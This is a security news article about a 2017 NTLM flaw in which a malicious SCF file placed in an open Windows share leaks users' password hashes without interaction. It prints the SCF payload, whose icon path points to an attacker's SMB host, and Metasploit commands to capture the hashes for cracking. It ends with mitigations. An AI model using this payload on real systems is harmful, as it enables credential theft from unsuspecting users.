Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

Newly discovered dangerous Vulnerability in NTLM Architecture allows hackers to steal Windows NTLM password without any user interaction in all the  Recent Version Windows OS.

NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

This vulnerability allows attackers can able to steal the NTLM hashes remotely without any user interaction using malicious SCF file that has to be placed in unprotected users windows machine.

This vulnerability has 100% attack vector for users who have unprotected shared folder without a password. share folder protected users are safe by this dangerous attack and since windows have default shared folder protection will protect most of the WIndows user.

Worst case is that, this is normal behavior in offices, schools, hospitals and almost all Windows environments, people share folders left open to sharing music, photos, and documents.

How Does Hackers Steal the NTLM hashes

Initially, the attacker will discover the unprotected share folder target victim machine and share the malicious  SCF file(Shell Command File)  to execute some basic tasks.

Since we already have few of  SCF file attacks which required manual user interaction to successfully execute the SCF file for Performing some malicious activities but this flow has required no user interaction.

Here Attacker can be used some traditional method via email to send the malicious SCF file and install into victim machine.

Basic SCF File structure that contains the shell. command file share ad task bar information

Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

This Malicious SCF File will be executed using the Metasploit module to capture the NTLM hash form the victim’s machine.

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop

root@sysadminjd:~#
root@sysadminjd:~# msfconsole -q

msf >use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job

[*] Server started.

Once attackers Craft the NTLM hash form the Victims machine they will use some Public availble tool such as John the Ripper  to crack the NTLM  hashes and redrive the Windows Login Credentials.

According to the  Researcher,Diego who Discovered this critical vulnerability have suggested some useful mitigation techniques.

1. Microsoft created a sort of patch to this vulnerability consisting in changing two registry keys to disable NTLM on the system. This registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intentions to backport to the other versions.
2. Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.
3. My suggestion is to use strong passwords, after the attack we need to crack the hash, that can take a lot of time if the password is complex, and can be frustrating for the attacker.
4. The better approach, don’t share folders without passwords, that’ll do the trick.

He has been reported this vulnerability on MAY 2017 and  finally Microsoft patch this Vulnerability in Oct 2017.

The patch is only for Windows 10 and Windows Server 2016 users. Older Windows versions remain vulnerable to this attack because the registry modifications are not compatible with older versions of the Windows Firewall.